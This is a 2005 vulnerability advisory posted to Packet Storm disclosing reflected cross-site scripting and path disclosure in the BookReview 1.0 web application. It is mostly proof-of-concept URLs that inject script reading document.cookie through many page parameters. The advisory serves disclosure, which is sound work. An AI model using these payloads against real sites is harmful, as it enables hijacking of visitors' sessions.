bookreviewXSS.txt

2005-08-14T00:00:00
ID PACKETSTORM:39327
Type packetstorm
Reporter Lostmon
Modified 2005-08-14T00:00:00

Description

                                        
                                            `###################################################  
BookReview 1.0 multiple variable XSS  
vendor url:http://www.readersunite.com  
advisore:http://lostmon.blogspot.com/2005/05/  
bookreview-10-multiple-variable-xss.html  
vendor notify: yes exploit available: yes  
###################################################  
  
BookReview contains a flaw that allows a remote cross  
site scripting attack.This flaw exists because the   
application does not validate multiple variables upon  
submission to multiple scripts.This could allow a user  
to create a specially crafted URL that would execute   
arbitrary code in a user's browser within the trust  
relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
  
############  
versions:  
############  
  
BookReview beta 1.0 vulnerable.  
  
  
##############  
solution  
##############  
  
no solutions was available at this time  
  
  
###########  
timeline  
###########  
  
discovered: 27 april 2005  
vendor notify 17 may 2005 (webform)  
disclosure: 26 may 2005  
  
  
  
##################  
proof of concepts  
###################  
all files are submitted to 'index.php' script by variable 'page' like   
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]  
the name of module can be 'add_review' 'add_contents' or others  
  
for example this url:  
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25  
  
is the same of this :  
  
http://[victim]/add_contents&isbn=083081423X&chapters=25  
  
with this if you think we have two ways for exploiting this situation  
, one with the index.php and other directly by the module.  
  
##################  
add_review.htm  
#################  
  
http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true  
  
http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true  
  
http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true  
  
http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>  
  
###################  
index.php  
###################  
  
http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25  
  
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
NICE ERROR !!  
  
  
; function tallyup() { var count = 0; var book = 0; var part = 0; var  
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";  
var section_prefix = ""; for ( i=0; i var persian = '' + value; var  
roman=""; var ronumdashes=""; var buffer=10-persian.length; while  
(buffer>0) {persian="0"+persian;buffer--} var units=new  
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new  
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var  
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");  
var thousands=new  
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var  
billionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
romandashes=billionsdashes[persian.substring(0,1)]; var  
hundredmillionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var  
tenmillionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var  
millionsdashes=new  
Array("","_","__","___","_=","=","=_","=__","=___","_=");  
romandashes+=millionsdashes[persian.substring(3,4)]; var  
hundredthousandsdashes=new  
Array("","_","__","___","__","_","__","___","____","__");  
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var  
tenthousandsdashes=new  
Array("","_","__","___","__","_","__","___","____","__");  
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var  
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");  
romandashes+=thousandsdashes[persian.substring(6,7)];  
roman=thousands[persian.substring(0,1)];  
roman+=hundreds[persian.substring(1,2)];  
roman+=tens[persian.substring(2,3)];  
roman+=thousands[persian.substring(3,4)];  
roman+=hundreds[persian.substring(4,5)];  
roman+=tens[persian.substring(5,6)];  
roman+=thousands[persian.substring(6,7)];  
roman+=hundreds[persian.substring(7,8)];  
roman+=tens[persian.substring(8,9)];  
roman+=units[persian.substring(9,10)]; return roman; } function  
alphabetise(number) { return String.fromCharCode(64+number); } ///  
function submitconfirm() { var agree =  
document.getElementById('agree'); if ( !agree.checked ) { alert("You  
must indicate your agreement to the terms and conditions by checking  
the box provided."); return false; } return true; }  
  
  
###################  
add_contents.htm  
###################  
  
  
http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
#########################  
others.  
#########################  
  
http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author  
  
http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels  
  
http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>  
  
############################  
posible local fle inclusion  
############################  
  
http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm  
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author  
  
  
  
################  
path disclosure:  
################  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth  
or  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title  
  
  
######################## €nd ########################  
  
thnx to estrella to be my ligth  
Thnx to icaro he is my Shadow !!!  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente  
`